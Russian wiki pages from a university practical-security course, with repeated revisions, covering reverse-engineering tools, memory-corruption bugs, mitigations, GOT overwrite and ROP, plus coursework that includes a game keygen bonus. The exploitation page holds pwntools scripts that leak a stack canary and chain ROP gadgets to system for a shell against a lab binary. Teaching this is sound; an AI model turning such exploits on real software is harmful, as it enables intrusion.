* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарник, который были рассмотрен на семинаре: [[Media:2023 reverse examples.zip]] (плюс сорцы).

Бинарные уязвимости/Инструменты поиска бинарных уязвимостей

2023-10-31T19:24:55Z

WGH: /* Примеры с занятия */

== strings ==

Выводит константные строки, которые есть в бинарнике. Строки определяются эвристикой, поэтому часто бывают ложные срабатывания. IDA тоже умеет определять строки.

<pre>
$ strings reverse_example_1
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
/lib64/ld-linux-x86-64.so.2
libcrypto.so.1.0.0
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
MD5_Final
MD5_Init
MD5_Update
libc.so.6
fopen
__stack_chk_fail
fgets
malloc
stderr
fwrite
__sprintf_chk
__libc_start_main
free
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.2.5
OPENSSL_1.0.0
D$(1
T$(dH3
AUATH
D$h1
|$hdH3<%(
x[]A\A]
AWAVA
AUATL
[]A\A]A^A_
%02X
./cd-key.txt
failed to open CD key file
failed to read CD key file
invalid cdkey
Good job!
;*3$"
.shstrtab
.interp
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
</pre>

== strace ==

Выводит трассу системных вызовов. Полезно, чтобы определить, какие файлы читает программа, и как вообще взаимодействует с внешним миром (в том числе сеть).

<pre>
$ strace ./reverse_example_1
...
openat(AT_FDCWD, "./cd-key.txt", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24, ...}) = 0
read(3, "AAAAA-BBBBB-CCCCC-DDDDD\n", 4096) = 24
write(2, "invalid cdkey\n", 14) = 14
exit_group(1) = ?
</pre>

== IDA Pro ==

Интерактивный дизассемблер и декомпилятор.

=== Шорткаты ===
<center style="font-size: 500%">
{{клавиша|F5}}
</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)
Неплохой [https://radare.gitbooks.io/radare2book/content/debugger/migration.html#shortcuts список] из доков по radare2.

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарник, который были рассмотрен на семинаре: [[Media:2023 reverse examples.zip]] (плюс сорцы).

Файл:2023 reverse examples.zip

2023-10-31T19:24:34Z

WGH: WGH загрузил новую версию Файл:2023 reverse examples.zip

Файл:2023 reverse examples.zip

2023-10-30T09:05:34Z

WGH:

Введение в практическую безопасность (2019)/Бинарная эксплуатация

2019-04-14T20:58:31Z

WGH: /* ASLR */ nm чтобы получить смещения функций в библиотеках

== Уязвимости ==

=== Переполнение буфера ===
Переполнение буфера (buffer overflow) происходит, когда программа не проверяет размер буфера должным образом при записи в него. Например, так делает печально известные функции <code>gets</code>, <code>strcpy</code>, а также такое встречается и в пользовательском коде.

Техника эксплуатации сильно зависит от того, где произошло переполнение.

* Стек - интересными объектами являются адрес возврата функции (для return-to-xxx, ROP), сохраненные регистры (RBP для проведения stack pivot), соседние переменные.
* Глобальные переменные - соседние глобальные переменные, а в случае переполнения назад (underwrite) - GOT.
* Куча - соседние аллокации памяти, а также внутренние структуры данных, используемая аллокатором<ref>https://sourceware.org/glibc/wiki/MallocInternals</ref><ref>https://github.com/shellphish/how2heap</ref><ref>Техники эксплуатации структур данных аллокатора не рассматриваются на этом спецкурсе.</ref>.

=== Buffer over-read ===

Очень похоже по своей сути на переполнение буфера, однако при этом содержимое памяти за пределами буфера выводится пользователю.

Обычно не приводит к чему-либо серьезному само по себе, однако может использоваться для обхода ASLR с целью эксплуатации других уязвимостей. А ещё см. нашумевший баг [[wikipedia:Heartbleed]].

=== Uninitialized memory read ===

Как следует из названия, чтение неинициализованной памяти. Как и в случае buffer over-read, там можно найти интересные данные.

=== Integer overflow ===

Целочисленное переполнение является опасной уззвимостью, когда переполнение происходит при рассчете размера для выделения памяти.

В следующем примере сумма <code>len1+len2</code> может переполниться таким образом, что len1 > len1 + len2 (https://ideone.com/qU4csI):
<pre>
int foo(int fd) {
size_t len1 = read_size(fd);
size_t len2 = read_size(fd);
char *buf = malloc(len1+len2);
read_data(fd, buf, len1);
read_data(fd, buf+len1, len2);
// ...
}
</pre>

Поэтому <code>read_data</code> может записать в буфер больше данных, чем доступно памяти в буфере, и затереть таким образом соседние объекты на куче.

Похожая проблема возникает при умножении и даже при неаккуратном прибавлении константного числа.

=== Use after free ===

Как и следует из названия, эта уязвимость возникает, когда память, выделанная <code>malloc</code>, используется после освобождения.

Наиболее серьезные последствия это несет, когда память содержит указатели: часто можно выделить на месте освобожденной памяти строку такого же размера, содержащую в себе запакованный указатель, и получить произвольное чтение или запись по абсолютному адресу.

== Средства защиты ==
В программах на языках C и C++, скомпилированных современными компиляторами и работающих на современных ОС, присутствует большое число противодействий бинарным уязвимостям (mitigations).

=== No execute (NX) ===

Средства ОС и процессора позволяют гибко настраивать права доступа на страницы виртуальной памяти. Эти права доступа позволяют запрещать выполнять данные как инструкции процессора. Напрмер, даже если записать шеллкод на стек, в память, выделенную через <code>malloc</code> или в статический глобальный буфер, при попытке выполнить этот код произойдет <code>SIGSEGV</code>

На уровне пользовательской программы это реализовано флагом <code>prot</code> в системных вызовах <code>mmap</code> и <code>mprotect</code>. Сам пользовательский код редко использует эти системные вызовы напрямую: ядро системы, динамический загрузчик (<code>ld.so</code>) и libc сами выделяют память с правильными правами доступа.

Фактически это означает, что чтобы в таких условиях добиться выполнения произвольного кода (или хотя бы выходящего за спецификацию исходной программы), придется провести атаку переиспользования кода (code reuse) в том или ином виде. Например, переписать указатель на какую-то безобидную функцую на <code>system</code>.

Посмотреть карту виртуальной памяти запущенного процесса можно при помощи программы <code>pmap</code>, команды <code>info proc mappings</code> в GDB, или <code>vmmap</code> в GDB+PEDA.

* https://en.wikipedia.org/wiki/NX_bit

=== ASLR ===

Чтобы затруднить атаки класса переиспользования кода (code reuse), такие как возврат в libc, адреса стека, кучи, и загрузки библиотек рандомизируются при каждом запуске программы. Это называется address space layout randomization.

Например, если в программе есть уязвимость, позволяющая переписать указатель на функцию, вы не можете записать туда адрес функции <code>system</code> просто потому, что вы не знаете адрес этой функции. Похожая ситуация будет, если есть указатель на какую-то структуру (например, содержащую в себе флаг <code>is_admin</code>): возможно вы и можете создать фейковую структуру с правильными полями на стеке, но вы не знаете, по какому адресу она окажется, чтобы записать этот адрес в тот указатель.

Как и многие другие защиты, ASLR не является абсолютной. Если в программе есть баг, позволяющий читать память за границей массива на стеке, с большой вероятностью вы там найдете адрес, ведущий в libc. Например, функция <code>main</code> возвращается куда-то в недра <code>__libc_start_main</code>, и если получится узнать адрес возврата, то посчитав смещение этого места относительно начала libc (для этой конкретной версии libc!), вы сможете узнать адрес загрузки библиотеки - и, соответственно, адреса всех функций, смещения которых фиксированы относительно базового адреса загрузки.

Вы можете посмотреть смещения функций в библиотеке при помощи команды <code>nm</code> или pwntools:
<pre>
$ nm -D ./libc.so.6 | egrep ' (malloc|system)$'
0000000000084130 T malloc
0000000000045390 W system
</pre>
<pre>
In [1]: from pwn import *

In [2]: libc = ELF("../pwn_tasks/libc.so.6")
[*] '/home/wgh/secsem2019/pwn_tasks/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

In [3]: print(hex(libc.sym["system"]))
0x45390
</pre>

Начиная с примерно 2018 года большинство дистрибутивов Linux стали компилировать программы в режиме PIE (position-independent executable), позволяющие ОС и загрузчику рандомизировать также адрес загрузки самого бинаря, который до этого был всегда фиксировано <code>0x00400000</code>.

Проверить наличие PIE можно при помощи следующей команды pwntools. ASLR же для стека, кучи и библиотек при этом присутствует в любом случае.

<pre>
$ pwn checksec /bin/bash
[*] '/bin/bash'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://en.wikipedia.org/wiki/Address_space_layout_randomization

=== Stack canary ===
Stack canary (<code>-fstack-protector</code>, stack smashing protector) - один из способов защиты от переполнения буфера на стеке.

При переполнении буфера освовную опасность представляет перезапись адреса возврата функции. От этого канарейка и защищает.

В прологе функции за адресом возврата<ref>Иногда и перед потенциально опасными локальными переменными, как то указатели на функции.</ref> на стек сохраняется специальное секретное значение, которое проверяется при выходе из функции. Если оно изменилось, то значит произошло переполнение буфера на стеке, и программа немедленно завершается, не выполняя инструкцию ret.

В glibc канарейка генерируется один раз при запуске программы, и никогда не меняется. Если есть уязвимость, позволяющая прочесть значение канарейки, то её можно обойти, просто записывая поверх канарейки её значение. Однако алгоритм генерации всегда включает в значение нулевой байт, что может усложнить эксплуатацию при помощи строковых функций типа <code>strcpy</code>.

В HexRays проверка канарейки декомпилируется неправильно. Но всегда, когда вы видите <code>__readfsqword(0x28u)</code>, можете быть увереными, что это оно. Если хотите посмотреть корректный код, смотрите дизассемблер.

* https://wiki.osdev.org/Stack_Smashing_Protector

== Техники эксплуатации ==

=== Перезапись GOT ===
В динамических слинкованных бинарях для вызова фунций из библиотек (libc и другие) используется специальная таблица GOT (global offset table).

Эта таблица содержит адреса библиотечных функций, которые требуются данной программе<ref>Библиотеки тоже могут использовать функции из других библиотек, у них тоже есть такая таблица.</ref>. Эта таблица заполняется динамических загрузчиком (ld.so, dynamic linker/loader). По умолчанию эта таблица заполняется лениво: вместо адресов целевых функций там лежат адреса заглушек, которые вызывают динамический загрузчик, который в свою очередь заносит в таблицу уже адрес нужной функции и передает управление на неё. При последующих вызовах функция уже будет вызываться непосредственно, без загрузчика.

Поскольку такая ленивость предполагает доступ к этой таблице на запись во время работы программы, записи в ней очень удобно переписывать в процессе эксплуатации. Основными претендентами являются функции, принимающие первым аргументом указатель на контролируемую пользователем строку, типа <code>free</code>, <code>strlen</code>, и т.д.: их удобно переписывать на адрес <code>system</code>.

Также бывает полезно читать данные оттуда для получения смещения libc и обхода ASLR таким образом.

Так как GOT обычно находится перед секциями <code>.data</code> и <code>.bss</code>, в эту таблицу можно попасть по отрицательным смещениям относительно глобальных переменных, также через arbitrary read/write по произвольному абсолютному адресу.

Опционально при компиляции можно включить защиту RELRO, которая делает эту таблицу неленивой и недоступной для запись. Уровень защиты можно проверить при помощи checksec (Partial RELRO с точки зрения эксплуатации не отличается от отсутствия RELRO, защиту обеспечивает только Full RELRO):
<pre>
% ~/.local/bin/pwn checksec /bin/cat
[*] '/bin/cat'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough/elf-symbols-got-overwrite

=== Return-oriented programming ===

Return-oriented programming (ROP) - популярная техника эксплуатации переполнения буфера на стеке.

В самом простом варианте эксплуатации такого переполнения переписывается только адрес возврата функции. Однако такое не позволяет вызвать функцию с произвольными параметрами, можно лишь передавать управление на готовые куски кода. Это само по себе неплохо, если есть хорошие места в программе или в библиотеках (см. [https://github.com/david942j/one_gadget one gadget RCE] в libc).

Но можно пойти дальше. Если есть возможность переписать и после адреса возврата, туда можно записать адреса т.н. гаджетов - последовательностей инструкций, заканчивающихся на <code>ret</code>.

Эти гаджеты можно находить при помощи программ ropper, ROPGadget, и других. Эти программы позволяют находить гаджеты, которые не видны при простом дизассемблировании, т.к. как они могут начинаться на середине инструкции:

<pre>
$ ~/.local/bin/pwn disasm -c amd64 5FC3
0: 5f pop rdi
1: c3 ret
$ ~/.local/bin/pwn disasm -c amd64 415FC3
0: 41 5f pop r15
2: c3 ret
</pre>

<pre>
$ ~/.local/bin/ropper --file example_1.5_gets
...
0x0000000000400ba3: pop rdi; ret;
0x0000000000400ba1: pop rsi; pop r15; ret;
...
</pre>

Например, нужно вызвать функцию по адресу <code>0xdeadbeef</code> функцию с аргументами 1 и 2. Тогда на стек, начиная с адреса возврата, нужно записать такие 64-битные числа: <code>0x0000000000400ba3, 0x1, 0x0000000000400ba1, 0x2, 0x1337, 0xdeadbeef</code>. Для понимания, как это работает, нужно отследить как меняется RSP по мере выполнения инструкций <code>ret</code> и <code>pop</code>.

* https://en.wikipedia.org/wiki/Return-oriented_programming
* https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI - какие регистры используются при вызове функций.

==== Пример эксплоита ====

Эксплоит для ./example_1.5_gets:

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

gdb.attach(p,
"b * 0x400B2D"
)

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24

payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x4009B0) # read_line
payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x400B33) # system

p.sendline(payload)

p.sendline("sh")

p.sendline("id")

p.interactive()

</pre>

== Инструменты ==

=== pwntools ===

pwntools - удобная библиотека-фреймворк для написания эксплоитов.

http://docs.pwntools.com/en/stable/index.html

Эксплоит для примера <code>example_1.5_gets</code>, разбираемого на задании ([[Media:2019 pwn samples.zip]]):

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
#context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

#gdb.attach(p) # <- uncomment to enable debugger

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24
payload += p64(0x400B33) # <- try to set it to 0xdeadbeef and see what happens in debugger

p.sendline(payload)

p.interactive()
</pre>

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Бинарная эксплуатация

2019-03-30T16:06:55Z

WGH: /* Уязвимости */ uaf

== Уязвимости ==

=== Переполнение буфера ===
Переполнение буфера (buffer overflow) происходит, когда программа не проверяет размер буфера должным образом при записи в него. Например, так делает печально известные функции <code>gets</code>, <code>strcpy</code>, а также такое встречается и в пользовательском коде.

Техника эксплуатации сильно зависит от того, где произошло переполнение.

* Стек - интересными объектами являются адрес возврата функции (для return-to-xxx, ROP), сохраненные регистры (RBP для проведения stack pivot), соседние переменные.
* Глобальные переменные - соседние глобальные переменные, а в случае переполнения назад (underwrite) - GOT.
* Куча - соседние аллокации памяти, а также внутренние структуры данных, используемая аллокатором<ref>https://sourceware.org/glibc/wiki/MallocInternals</ref><ref>https://github.com/shellphish/how2heap</ref><ref>Техники эксплуатации структур данных аллокатора не рассматриваются на этом спецкурсе.</ref>.

=== Buffer over-read ===

Очень похоже по своей сути на переполнение буфера, однако при этом содержимое памяти за пределами буфера выводится пользователю.

Обычно не приводит к чему-либо серьезному само по себе, однако может использоваться для обхода ASLR с целью эксплуатации других уязвимостей. А ещё см. нашумевший баг [[wikipedia:Heartbleed]].

=== Uninitialized memory read ===

Как следует из названия, чтение неинициализованной памяти. Как и в случае buffer over-read, там можно найти интересные данные.

=== Integer overflow ===

Целочисленное переполнение является опасной уззвимостью, когда переполнение происходит при рассчете размера для выделения памяти.

В следующем примере сумма <code>len1+len2</code> может переполниться таким образом, что len1 > len1 + len2 (https://ideone.com/qU4csI):
<pre>
int foo(int fd) {
size_t len1 = read_size(fd);
size_t len2 = read_size(fd);
char *buf = malloc(len1+len2);
read_data(fd, buf, len1);
read_data(fd, buf+len1, len2);
// ...
}
</pre>

Поэтому <code>read_data</code> может записать в буфер больше данных, чем доступно памяти в буфере, и затереть таким образом соседние объекты на куче.

Похожая проблема возникает при умножении и даже при неаккуратном прибавлении константного числа.

=== Use after free ===

Как и следует из названия, эта уязвимость возникает, когда память, выделанная <code>malloc</code>, используется после освобождения.

Наиболее серьезные последствия это несет, когда память содержит указатели: часто можно выделить на месте освобожденной памяти строку такого же размера, содержащую в себе запакованный указатель, и получить произвольное чтение или запись по абсолютному адресу.

== Средства защиты ==
В программах на языках C и C++, скомпилированных современными компиляторами и работающих на современных ОС, присутствует большое число противодействий бинарным уязвимостям (mitigations).

=== No execute (NX) ===

Средства ОС и процессора позволяют гибко настраивать права доступа на страницы виртуальной памяти. Эти права доступа позволяют запрещать выполнять данные как инструкции процессора. Напрмер, даже если записать шеллкод на стек, в память, выделенную через <code>malloc</code> или в статический глобальный буфер, при попытке выполнить этот код произойдет <code>SIGSEGV</code>

На уровне пользовательской программы это реализовано флагом <code>prot</code> в системных вызовах <code>mmap</code> и <code>mprotect</code>. Сам пользовательский код редко использует эти системные вызовы напрямую: ядро системы, динамический загрузчик (<code>ld.so</code>) и libc сами выделяют память с правильными правами доступа.

Фактически это означает, что чтобы в таких условиях добиться выполнения произвольного кода (или хотя бы выходящего за спецификацию исходной программы), придется провести атаку переиспользования кода (code reuse) в том или ином виде. Например, переписать указатель на какую-то безобидную функцую на <code>system</code>.

Посмотреть карту виртуальной памяти запущенного процесса можно при помощи программы <code>pmap</code>, команды <code>info proc mappings</code> в GDB, или <code>vmmap</code> в GDB+PEDA.

* https://en.wikipedia.org/wiki/NX_bit

=== ASLR ===

Чтобы затруднить атаки класса переиспользования кода (code reuse), такие как возврат в libc, адреса стека, кучи, и загрузки библиотек рандомизируются при каждом запуске программы. Это называется address space layout randomization.

Например, если в программе есть уязвимость, позволяющая переписать указатель на функцию, вы не можете записать туда адрес функции <code>system</code> просто потому, что вы не знаете адрес этой функции. Похожая ситуация будет, если есть указатель на какую-то структуру (например, содержащую в себе флаг <code>is_admin</code>): возможно вы и можете создать фейковую структуру с правильными полями на стеке, но вы не знаете, по какому адресу она окажется, чтобы записать этот адрес в тот указатель.

Как и многие другие защиты, ASLR не является абсолютной. Если в программе есть баг, позволяющий читать память за границей массива на стеке, с большой вероятностью вы там найдете адрес, ведущий в libc. Например, функция <code>main</code> возвращается куда-то в недра <code>__libc_start_main</code>, и если получится узнать адрес возврата, то посчитав смещение этого места относительно начала libc (для этой конкретной версии libc!), вы сможете узнать адрес загрузки библиотеки - и, соответственно, адреса всех функций, смещения которых фиксированы относительно базового адреса загрузки.

Начиная с примерно 2018 года большинство дистрибутивов Linux стали компилировать программы в режиме PIE (position-independent executable), позволяющие ОС и загрузчику рандомизировать также адрес загрузки самого бинаря, который до этого был всегда фиксировано <code>0x00400000</code>.

Проверить наличие PIE можно при помощи следующей команды pwntools. ASLR же для стека, кучи и библиотек при этом присутствует в любом случае.

<pre>
$ pwn checksec /bin/bash
[*] '/bin/bash'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://en.wikipedia.org/wiki/Address_space_layout_randomization

=== Stack canary ===
Stack canary (<code>-fstack-protector</code>, stack smashing protector) - один из способов защиты от переполнения буфера на стеке.

При переполнении буфера освовную опасность представляет перезапись адреса возврата функции. От этого канарейка и защищает.

В прологе функции за адресом возврата<ref>Иногда и перед потенциально опасными локальными переменными, как то указатели на функции.</ref> на стек сохраняется специальное секретное значение, которое проверяется при выходе из функции. Если оно изменилось, то значит произошло переполнение буфера на стеке, и программа немедленно завершается, не выполняя инструкцию ret.

В glibc канарейка генерируется один раз при запуске программы, и никогда не меняется. Если есть уязвимость, позволяющая прочесть значение канарейки, то её можно обойти, просто записывая поверх канарейки её значение. Однако алгоритм генерации всегда включает в значение нулевой байт, что может усложнить эксплуатацию при помощи строковых функций типа <code>strcpy</code>.

В HexRays проверка канарейки декомпилируется неправильно. Но всегда, когда вы видите <code>__readfsqword(0x28u)</code>, можете быть увереными, что это оно. Если хотите посмотреть корректный код, смотрите дизассемблер.

* https://wiki.osdev.org/Stack_Smashing_Protector

== Техники эксплуатации ==

=== Перезапись GOT ===
В динамических слинкованных бинарях для вызова фунций из библиотек (libc и другие) используется специальная таблица GOT (global offset table).

Эта таблица содержит адреса библиотечных функций, которые требуются данной программе<ref>Библиотеки тоже могут использовать функции из других библиотек, у них тоже есть такая таблица.</ref>. Эта таблица заполняется динамических загрузчиком (ld.so, dynamic linker/loader). По умолчанию эта таблица заполняется лениво: вместо адресов целевых функций там лежат адреса заглушек, которые вызывают динамический загрузчик, который в свою очередь заносит в таблицу уже адрес нужной функции и передает управление на неё. При последующих вызовах функция уже будет вызываться непосредственно, без загрузчика.

Поскольку такая ленивость предполагает доступ к этой таблице на запись во время работы программы, записи в ней очень удобно переписывать в процессе эксплуатации. Основными претендентами являются функции, принимающие первым аргументом указатель на контролируемую пользователем строку, типа <code>free</code>, <code>strlen</code>, и т.д.: их удобно переписывать на адрес <code>system</code>.

Также бывает полезно читать данные оттуда для получения смещения libc и обхода ASLR таким образом.

Так как GOT обычно находится перед секциями <code>.data</code> и <code>.bss</code>, в эту таблицу можно попасть по отрицательным смещениям относительно глобальных переменных, также через arbitrary read/write по произвольному абсолютному адресу.

Опционально при компиляции можно включить защиту RELRO, которая делает эту таблицу неленивой и недоступной для запись. Уровень защиты можно проверить при помощи checksec (Partial RELRO с точки зрения эксплуатации не отличается от отсутствия RELRO, защиту обеспечивает только Full RELRO):
<pre>
% ~/.local/bin/pwn checksec /bin/cat
[*] '/bin/cat'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
</pre>

* https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough/elf-symbols-got-overwrite

=== Return-oriented programming ===

Return-oriented programming (ROP) - популярная техника эксплуатации переполнения буфера на стеке.

В самом простом варианте эксплуатации такого переполнения переписывается только адрес возврата функции. Однако такое не позволяет вызвать функцию с произвольными параметрами, можно лишь передавать управление на готовые куски кода. Это само по себе неплохо, если есть хорошие места в программе или в библиотеках (см. [https://github.com/david942j/one_gadget one gadget RCE] в libc).

Но можно пойти дальше. Если есть возможность переписать и после адреса возврата, туда можно записать адреса т.н. гаджетов - последовательностей инструкций, заканчивающихся на <code>ret</code>.

Эти гаджеты можно находить при помощи программ ropper, ROPGadget, и других. Эти программы позволяют находить гаджеты, которые не видны при простом дизассемблировании, т.к. как они могут начинаться на середине инструкции:

<pre>
$ ~/.local/bin/pwn disasm -c amd64 5FC3
0: 5f pop rdi
1: c3 ret
$ ~/.local/bin/pwn disasm -c amd64 415FC3
0: 41 5f pop r15
2: c3 ret
</pre>

<pre>
$ ~/.local/bin/ropper --file example_1.5_gets
...
0x0000000000400ba3: pop rdi; ret;
0x0000000000400ba1: pop rsi; pop r15; ret;
...
</pre>

Например, нужно вызвать функцию по адресу <code>0xdeadbeef</code> функцию с аргументами 1 и 2. Тогда на стек, начиная с адреса возврата, нужно записать такие 64-битные числа: <code>0x0000000000400ba3, 0x1, 0x0000000000400ba1, 0x2, 0x1337, 0xdeadbeef</code>. Для понимания, как это работает, нужно отследить как меняется RSP по мере выполнения инструкций <code>ret</code> и <code>pop</code>.

* https://en.wikipedia.org/wiki/Return-oriented_programming
* https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI - какие регистры используются при вызове функций.

==== Пример эксплоита ====

Эксплоит для ./example_1.5_gets:

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

gdb.attach(p,
"b * 0x400B2D"
)

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24

payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x4009B0) # read_line
payload += p64(0x0000000000400ba3) # pop rdi
payload += p64(0x6020B0) # -> rdi
payload += p64(0x400B33) # system

p.sendline(payload)

p.sendline("sh")

p.sendline("id")

p.interactive()

</pre>

== Инструменты ==

=== pwntools ===

pwntools - удобная библиотека-фреймворк для написания эксплоитов.

http://docs.pwntools.com/en/stable/index.html

Эксплоит для примера <code>example_1.5_gets</code>, разбираемого на задании ([[Media:2019 pwn samples.zip]]):

<pre>
#!/usr/bin/env python2

from pwn import *

# http://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.terminal
# or just run in tmux and everything will work
#context.terminal = ["xterm", "-e"]

p = process(["stdbuf", "-i0", "-o0", "./example_1.5_gets"])

#gdb.attach(p) # <- uncomment to enable debugger

p.sendline("128")
p.sendline("aaaa")

#p.interactive()

p.recvuntil("Hello, ")

data = p.recvuntil("Enter password")

print hexdump(data)

canary = data[40:48]

payload = ""
payload += "A" * 40
payload += canary
payload += "A" * 24
payload += p64(0x400B33) # <- try to set it to 0xdeadbeef and see what happens in debugger

p.sendline(payload)

p.interactive()
</pre>

== Примечания ==
<references/>

Введение в практическую безопасность (2019)/Задания по реверс-инжинирингу и эксплуатации бинарных уязвимостей

2019-03-30T16:02:14Z

WGH: /* Задания по эксплуатации бинарных уязвимостей */ дедлайн

== Задания по реверс-инжинирингу ==

=== Обязательные задания ===
Задания по этой теме реализованы в формате типичного crackme/задания на реверс на task-based CTF.

Дан исполняемый файл для ОС Linux. Нужно подобрать такой ввод, чтобы некая проверка внутри была пройдена. В случае успеха программа будет явно писать фразу в духе "успех".

Для зачисления баллов необходимо написать небольшой отчет о проделанной работе: какие инструменты были использованы, какие алгоритмы проверки ввода используются в задании, каким образом вы это поняли Отчет не обязан быть написан строго формально, но должен быть читаемым и понятным. Отчет нужно отправлять на почту mailto:wgh+secsem2019@seclab.cs.msu.ru. К отчету также необходимо приложить ваше имя/никнейм, которые вы использовали в [https://dashboard.course.secsem.ru/ дэшборде] при сдаче заданий по вебу, чтобы мы могли зачислить вам очки.

Дедлайн: 10 апреля 2019, 23:59 MSK.

; [[Media:2019 reverse task 1.zip]]
: При написании генератора ключей начисляется 150 баллов (генератор должен быть приложен к отчету), при получении одного валидного ключа - 100 баллов.
; [[Media:2019 reverse task 2.zip]]
: При успешном выполнении задания начисляется 150 баллов.

=== Бонусное задание ===
Требуется разреверсить алгоритм проверки лицензионных ключей у компьютерной игры по выбору, и написать генератор ключей<ref>Игра конечно же должна быть законно приобретена вами.</ref>.

